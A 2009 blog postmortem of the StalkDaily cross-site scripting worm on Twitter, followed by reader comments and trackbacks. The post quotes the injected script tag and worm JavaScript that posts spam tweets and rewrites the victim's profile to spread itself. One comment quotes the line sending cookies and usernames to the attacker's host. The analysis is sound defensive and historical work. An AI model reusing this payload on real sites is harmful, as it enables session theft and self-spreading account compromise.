Twitter StalkDaily Worm Postmortem
Twitter got hit with a little security incident this afternoon we’ll call the “StalkDaily Worm”. I have no clue if the StalkDaily site was actually associated with the worm at this point or if it was simply a misdirection. I believe it to be the latter.
At around 3:43pm PST this afternoon I noticed some odd updates from a couple of my friends regarding the StalkDaily site. I then saw this tweet from @JoeCascio:
First virus-like hack of Twitter is StalkDaily.com. Looks like a code injection in the Location field of your profile.
Coming from Joe, I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:
<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js>"
That part in red is particularly bad and is what was getting injected into people’s profiles. Taking a quick look at the JavaScript that it actually links to, there were a few lines in particular that caught my eye:
var update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! ");
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
What’s happening here is that it looks like somebody realized they could save url encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing somebody’s profile page on Twitter that was already infected. If you visited an infected profile, the JavaScript in the profile would execute and by doing so tweet the mis-leading link, and update your profile with the same malicious JavaScript thereby infecting anybody that then visits your profile on twitter.com.
This was a nasty little script.
This is also one of the reasons that I browse the web with NoScript. It’s a hassle, sure, but it prevented the script from an untrusted domain (uuuq.com) from running on Twitter.com.
As we’ve seen with worms in the past, this attack was loud and noisy and all the attackers did was collect your Twitter username and cookie. Had they been playing for real, a more profitable approach would have been to leave your profile URL intact and insert some JavaScript that turned your browser into an endpoint on a bot network. </doomandgloom>
It looks like Twitter has already taken care of the issue for the most part. Thanks to @al3x and crew for their near-instant response on what was likely a nice relaxing Saturday afternoon.
If you have the stalkdaily URL in your profile, you were likely attacked by this issue. Twitter has taken care of it at this point, so feel free to correct your URL and continue with your Saturday evening Twittering. There’s some more information on this post.
Be safe out there – the Internet is a dangerous place.
Update (2009-04-12): A brief update – another round of the worm hit Twitter on Sunday morning. It was effectively the same thing, but attacked a different field. The code, oddly enough, had also been run through an obfuscator. You can see the partially obfuscated code from the second worm here: second version of worm.
Hey Damon,
April 11th, 2009 at 5:34 pmI was hoping you’d get to the bottom of this exploit and write it up. Thanks!! And as you say… “Let’s be careful out there!”
Thinking team twitter did well.
I’d like to see the deer ticks that
April 11th, 2009 at 7:01 pmlaunched this exploit doing the backstroke off Somalia
Good stuff, I’ve been posting that notice of the code being web address related on a number of blogs and tweets.
I think it’s a shame stalkdaily.com automatically gets the blame for this thing when the worm could’ve easily “promoted” myspace, facebook, your blog, or any other website of choosing.
April 11th, 2009 at 7:17 pm@a3lx and crew did well shutting down the worm
Whoever was “in charge” of informing the tweeple Was nowhere to be found. There’s no excuse for twitter having failed to post a notice to status.twitter.com about this incident. It should have been posted immediately, with any details and corrective measures that twitter was taking and that users should have taken. It shold have been updated as soon as the situation progressed.
But it’s no surprise. Twitter doesn’t really care about its users. A few great people inside twitter (like @a3lx) do care, but that doesn’t help the users to know anything. The users of twitter are left in the dark hunting for answers.
In fact, as I write this, I am still inundated with user questions about what happened, how to know if they are infected, and what to do if they are.
I said it on Mashable’s page, and I’ll say it here: It was TOTALLY IRRESPONSIBLE of Twitter to leave their users in the dark.
April 11th, 2009 at 7:26 pmRob,
I agree Twitter does need a more effective means of notifying their users in situations like this. While perhaps abusive of the mentions functionality, I @’ed some Twitter team members a couple times as I wasn’t sure if they were aware of it or not.
Of course as I write this @twitter makes an update.
http://status.twitter.com/post/95332007
April 11th, 2009 at 7:34 pmDamon,
In an incident like this, I think that your use of the @mention facility it exactly correct. I dont’ have a lot of the team members names, but I sure @ ‘ed #ev and #biz a few times (and at least @netik)
And how can you be sure if they’re aware unless someone updates the status page? Just a simple mention cuts the volume down considerably. (I do speak from first hand experience of running a TechOps department of a very public new technology site)
April 11th, 2009 at 8:48 pmIt looks like a 17 year old boy has admitted to being behind the worm : http://www.bnonews.com/news/242.html
April 12th, 2009 at 1:03 am[...] More info on the technical internals of the attack are available at dcortesi.com. [...]
April 12th, 2009 at 1:55 amThanks for the tech info. It appears that stalkdaily.com is hosted by Dreamhost and uuuq.com is hosted by GoDaddy. I’ve contacted them both asking them to remove “Mikeyy”’s accounts:
http://letstakeover.blogspot.com/2009/04/fight-back-against-stalkdaily-and-its.html
April 12th, 2009 at 4:10 am[...] technical detail on the attack is available at dcortesi.com. Twitter is reporting that they have already taken care of the problem, but still it’s probably a [...]
April 12th, 2009 at 5:10 amDid IE8’s XSS Filter help protect against this?
April 12th, 2009 at 7:09 am[...] a technical explanation of what was going on, I refer you to Damon Cortesi’s Twitter StalkDaily Worm Postmortem. An easy way to check to see if you’ve been infected is to search twitter for “{your [...]
April 12th, 2009 at 7:35 am[...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]
April 12th, 2009 at 9:29 am[...] left a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]
April 12th, 2009 at 9:48 am[...] left a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]
April 12th, 2009 at 9:48 am[...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]
April 12th, 2009 at 9:58 amAwesome write-up!
April 12th, 2009 at 10:32 am[...] You can read the full story here. Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages. [...]
April 12th, 2009 at 10:38 am[...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]
April 12th, 2009 at 11:02 am[...] http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/ [...]
April 12th, 2009 at 1:17 pm[...] Python – Spam 相変わらずのJavaScriptを使ったクロスサイト誘導: Twitter StalkDaily Worm Postmortem script src=”hxxp://mikeyylolz.uuuq.com/x.js 212.95.49.251 NETDIRECT-NET-DEDISERV (Poland ) [...]
April 12th, 2009 at 2:45 pm[...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi blog. Clearly Mikeyy is still bored as the new version is now making its way across the [...]
April 12th, 2009 at 3:03 pm[...] has a nice description of one of the worms that hit Twitter this weekend. DCortesi . blog >> Twitter StalkDaily Worm Postmortem Tags: ( twitter worm [...]
April 12th, 2009 at 4:29 pm[...] GitHub 上查看,有关昨天受到攻击的漏洞的“尸检”,请查看 DCortesi [...]
April 12th, 2009 at 7:17 pm[...] Comment! Found a full post mortem of the latest worm to hit the Social Media scene – StalkDaily. Very interestingly, twitter allowed to add script tags in their profile, and 17-year old Mickeyy Mooney employed a cross-site scripting attack to not just post an update promoting his own site StalkDaily.com, but also added the same malicious javascript on the profile pages of who-ever visited an infected page. The modus operandi of the attack is described in more detail here. [...]
April 12th, 2009 at 7:23 pm[...] GitHub 上查看,有关昨天受到攻击的漏洞的“尸检”,请查看 DCortesi [...]
April 12th, 2009 at 7:59 pm[...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]
April 12th, 2009 at 10:06 pm[...] has posted a nice summary of a script exploit in Twitter I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily [...]
April 12th, 2009 at 10:25 pm[...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]
April 13th, 2009 at 12:17 am[...] StalkDaily.com. A good technical description of its rather simple inner workings has been kindly provided by Damon Cortesi. As you can see, unless the mikeyylolz.uuuq.com doman is allowed to run JavaScript (very unlikely [...]
April 13th, 2009 at 3:27 am[...] an analysis of the script that it uses, check out DCortesi’s excellent blog post. Excerpt below: … it looks like somebody realized they could save url encoded data to the [...]
April 13th, 2009 at 4:07 amWhy does the worm code send the cookie and username back to his site with:
http://mikeyylolz.uuuq.com/x.php?c=” + cookie + “&username=” + username
when it can update the profile and the notices using XHConn()?
is that just to prove a point?
April 13th, 2009 at 6:35 amIll be one to say it, thank god this was written by a script kiddie and not someone who actually had malicious intentions.
April 13th, 2009 at 7:01 amFrank,
Maybe the worm author wanted a) a record of who had been compromised and b) the potential to re-inject or compromise those accounts again if the profile code got removed?
Or c) because he was bored and that’s what all the other worms do.
b) is interesting because say somebody with a large number of followers gets infected. They will be notified quickly and fix their profile, but imagine how frustrating it would be if their cookie was still valid and a simple cron job kept updating it.
April 13th, 2009 at 9:01 am[...] bookmarks tagged blog DCortesi . blog » Twitter StalkDaily Worm Postmor… saved by 3 others gli0444 bookmarked on 04/13/09 | [...]
April 13th, 2009 at 10:48 am[...] seems that a XSS worm is spreading among twitter users … here more [...]
April 13th, 2009 at 12:12 pm[...] alle betrokkenheid bij de aanval en zegt zelf het slachtoffer van hackers te zijn geweest. Verdere analyse van aanval wijst uit dat de aanvallers erin geslaagd waren om script van een andere website op [...]
April 14th, 2009 at 12:32 am@Ed, but you guys are supposed to make it impossible for the guy to exploit you. I wouldve thought this a simple thing to handle. You dont think that a hacker with such a great exploit is just going to let it go by without using it
great write up by the way.
April 14th, 2009 at 2:41 am[...] Worm [4] Twitter worm “StalkDaily” launched, spread, defeated | ITworld [5] DCortesi . blog ” Twitter StalkDaily Worm Postmortem [6] Techmeme: Update on StalkDaily.com Worm (Twitter [...]
April 14th, 2009 at 4:26 am[...] More info on the technical internals of the attack are available at dcortesi.com. [...]
April 14th, 2009 at 5:40 pm[...] a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi [...]
April 18th, 2009 at 9:00 pm[...] fought off four waves of worm attacks created by Mikeyy Mooney. Damon Cortesi wrote an excellent postmortem post that explains exactly how the worm worked and what code was [...]
April 19th, 2009 at 7:45 am[...] also become infected just by looking at an compromised Twitter profile page. For those so inclined, Damon Cortesi has posted a blog that takes an in-depth look at the worm [...]
April 21st, 2009 at 2:45 am[...] also become infected just by looking at a compromised Twitter profile page. For those so inclined, Damon Cortesi has posted a blog that takes an in-depth look at how the worm [...]
April 25th, 2009 at 12:48 pm[...] This worm infected the profiles of Twitter users so that they contained malicious code. Logged-in Twitter users who would view one of these infected profiles would then, through execution of the JavaScript injected into these profiles via an XSS hole, have their own profiles infected with the same code. Therefore, propagation of this worm occurred via logged-in Twitter users simply viewing infected profiles. The source code used by this worm can be viewed here. As one can see by viewing this source code that is called from infected Twitter pages, it injects the malicious script and other data that would appear in profiles when they are infected with this worm. Damon Cortesi gives a good analysis of the worm here. [...]
April 27th, 2009 at 3:50 pm[...] Twitter StalkDaily Worm Postmortem [...]
May 3rd, 2009 at 6:24 pm[...] Mikeyy worm17 ročný mladík, Michael Mooney, sa preslávil za niekoľko hodín vytvorením červa, ktorý zneužíval zlú filtráciu prichádzajúcich správ. [...]
June 16th, 2009 at 8:35 am[...] and executed consistently. An excellent example of stored cross site scripting is the recent Mikeyy Stalk Daily worm attack on Twitter. Mikeyy’s code was stored in the profile data for twitter users and was subsequenty [...]
June 19th, 2009 at 7:35 am“Thinking team twitter did well.”
Thinking they are foolish.
July 22nd, 2009 at 12:41 pm[...] also become infected just by looking at a compromised Twitter profile page. For those so inclined, Damon Cortesi has posted a blog that takes an in-depth look at how the worm [...]
August 7th, 2009 at 12:33 am[...] An additional interesting blog is about about Twitter black-out that happened couple of days ago, the user explains in detail what really happened to Twitter becoming unavailable.http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/ [...]
August 11th, 2009 at 11:34 pm[...] on Twitter 中身はこの辺やこの辺に。 みんな楽しそうに見えるのですが… [...]
September 24th, 2009 at 8:57 pm[...] fought off four waves of worm attacks created by Mikeyy Mooney. Damon Cortesi wrote an excellent postmortem post that explains exactly how the worm worked and what code was [...]
October 8th, 2009 at 3:43 am[...] More info on the technical internals of the attack are available at dcortesi.com. [...]
December 12th, 2009 at 4:11 am